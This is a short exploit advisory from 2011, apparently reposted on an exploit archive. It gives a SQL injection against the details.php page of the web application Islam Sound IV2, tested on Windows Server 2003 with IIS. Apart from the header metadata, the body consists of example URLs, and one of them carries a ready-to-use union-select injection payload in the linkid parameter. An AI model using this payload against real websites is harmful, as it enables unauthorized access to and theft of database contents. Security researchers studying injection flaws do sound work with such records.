id: 15349
date: 02/04/2011
title: Islam Sound IV2 (details.php) Remote SQL Injection Vulnerability
author: ZxH-Labs
cves: 

# Lab : ZxH-Lab's
# Locate : Jordan - Amman City
# Exploit Title  : Islam Sound IV2 (details.php) Remote SQL Injection
# Date : 2-2-2011
# Author : ZxH-Labs
# HomeScript  : http://www.emides.com/
# Version : 2.0
# Tested On  : Windows Server 2003 [IIS]
 
====================================================
#             http://www.site.org/details.php?linkid=[SQL Codes]
#             http://www.site.org/details.php?linkid=-68+and+1=2+union+select+1,2,3,4,5,6,7,8,9--
====================================================



#  0day.today [2023-03-25]  #